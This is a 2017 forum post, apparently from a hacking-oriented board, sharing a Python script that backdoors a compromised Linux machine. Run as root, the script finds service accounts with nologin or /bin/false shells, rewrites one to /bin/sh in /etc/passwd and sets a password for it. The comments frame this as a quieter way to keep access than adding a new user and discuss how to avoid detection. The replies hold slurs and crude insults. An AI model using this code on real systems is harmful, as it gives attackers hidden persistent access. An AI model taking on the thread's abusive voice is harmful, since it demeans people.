User Controls

convoluted 2-step linux thing in a python script

mempodippy Yung Blood

#!/usr/bin/env python

# so this is something i made in about 20-30 minutes because i was looking at old threads and saw someone say something along the lines of
    # "change the login shell of an unused account to /bin/sh and change the password of the account"
    # the context of what they said is lost to me, i don't remember why they said what they said
    # but here u go. how to convolute one sed command or a tiny bit of file editing and password changing in 90 lines :D
    # i do feel autistic but i was very bored

# whipped up with python 3.6.2 in mind, but the changes won't be too drastic if you want this to work on older versions

# changing the login shell of an unused account is less noticeable than adding a completely new user, but once the password for the existing user
    # has been changed, the hashed password will show up in /etc/shadow. only people able to see the pw hash in shadow though are users with root privs.
    # normal users (on most default setups) can read /etc/passwd and see that an account like mail or some shit has a /bin/sh login shell. SKETCH SKETCH SKETCH

# moral of the story: just use rootkits

# mem@xmpp.is

import os
    if os.getuid() != 0:
    print(" [-] not root, exiting")
    quit()

# some people like to be gay
    PASSWD = "/etc/passwd"
    # add usernames to this list and the script will ignore them completely
    IGNORE_USR = ["root"]
    # only look for accounts in /etc/passwd which login shells equal below
    SEEK_LOGIN_SHELL = ["/usr/bin/nologin", "/sbin/nologin", "/bin/false"]
    # new shell to replace above with
    NEW_SHELL = "/bin/sh"

if not os.path.exists(PASSWD):
    print("[-] passwd file {0} doesn't exist".format(PASSWD))
    quit()

# get usernames from /etc/passwd based on which accounts are being ignored and which accounts adhere to which login shells to look for
    # ask user which account they would like to 'backdoor'
    # change last parameter "/sbin/nologin" "/usr/bin/nologin" or"/bin/false" to "/bin/sh"
    # change password of specified account

def split_passwd():
    passwd_fd = open(PASSWD, "r") # open /etc/passwd for reading
    l_passwd = passwd_fd.read().split("\n") # split /etc/passwd by every newline character
    passwd_fd.close()
    return l_passwd

# the difference between this and seek_passwd_uname() is that this searches for all usernames in /etc/passwd. the one below searches for one specific account and returns that account line as a list
    def seek_passwd_unames():
    l_passwd = split_passwd()
    unames = []
    for x in l_passwd:
    l_x = x.split(":") # split each line by every colon separator
    if l_x[0] in IGNORE_USR: continue # if we find a user we want to ignore, skip this iteration of the loop and move onto the next line of /etc/passwd
    if l_x[-1] in SEEK_LOGIN_SHELL: unames.append(l_x[0]) # we've cut down the users in /etc/passwd to the users we want and can add said users to our list for later
    return unames

# find specified account entry line in /etc/passwd
    def seek_passwd_uname(user):
    l_passwd = split_passwd()
    for x in l_passwd:
    l_x = x.split(":")
    if l_x[0] == user: return x.split(":")
    print("[-] error. couldn't find specified user in {0}. wtf ???????".format(PASSWD))
    quit()

# replace old login shell option in list with new shell and build new /etc/passwd account entry string
    def change_acc_shell(ent):
    new_ent = ent
    for x in SEEK_LOGIN_SHELL:
    if ent[-1] == x:
    new_ent = [acc.replace(x, NEW_SHELL) for acc in new_ent] # replace default login shell with our new specified shell (default /bin/sh)
    return ':'.join(map(str, new_ent)) # build new /etc/passwd account entry

def replace_acc_entry(old, new):
    passwd_fd = open(PASSWD, "r+")
    o_passwd_contents = passwd_fd.read()
    n_passwd_contents = o_passwd_contents.replace(':'.join(map(str, old)), new)
    passwd_fd.seek(0)
    passwd_fd.write(n_passwd_contents)
    passwd_fd.truncate()

if __name__ == "__main__":
    print("[+] starting")
    users = seek_passwd_unames()
    print("[+] available currently unused accounts:\n" + ','.join(map(str, users)))
    acc = ""
    while not acc in users:
    acc = input("[!] which account would you like to use?: ")
    if not acc in users: print("[-] you specified an unavailable account fucko, try again")
    else: break

new_entry = change_acc_shell(seek_passwd_uname(acc))

print("[+] replacing old account entry in {0} with new account".format(PASSWD))
    replace_acc_entry(seek_passwd_uname(acc), new_entry)

print("[+] account entry changed. changing password for account")
    os.system("passwd {0}".format(acc)) # fucking SUE ME

print("[+] finished")

oh also the times of file modifications to /etc/passwd (when no new account has been added) and shadow will give off an indication that something's weird

Post last edited by mempodippy at 2017-08-30T03:34:24.769061+00:00
    The following users say it would be alright if the author of this post didn't die in a fire!
    RisiR † 29 Autism
    Is this a bot?
    mempodippy Yung Blood
    yes ((no))
    everything i typed in the commenting in the script wasn't worth repeating in the post
    and i did actually add onto the post with stuff i didn't comment
    RisiR † 29 Autism
    Ok.

Welcome to the forum, I guess. Enjoy yourself and stay away from Bill Krozby. He has AIDS.
    mempodippy Yung Blood
    thanks
    i'll try my best but aids often finds its way to me
    SBTlauien African Astronaut
    OP seems a like Sophie. I like Sophie.
    mempodippy Yung Blood
    i'm not sophie but sophie is a kool kat.
    Sophie Pedophile Tech Support
    Nicu, i like Sophie too btw. Oh and double btw, you can also post in code tags like so:

[_code_] # Code and such [/_code_]

Without underscores.

Thanks for sharing. Also python 3.x, that reminds in 30 months 2.7 is getting retired, rip. The shittiest thing about that is i learned library specific syntax for 2.7 and i don't think all of them are getting ported to 3.x so eh, i'll make do though.
    mempodippy Yung Blood
    thanks i wasn't sure what bb codes were available
    python isn't really ever that difficult to adapt to when version changes fuck everything up... it's just fucking annoying time after time. LIKE STOP
    Sophie Pedophile Tech Support
    Originally posted by mempodippy thanks i wasn't sure what bb codes were available
    python isn't really ever that difficult to adapt to when version changes fuck everything up… it's just fucking annoying time after time. LIKE STOP

Yeah i had the same issue with Selenium, wrote a bot, then it broke due to version changes. It's since been fixed though but annoying af.
Jump to Top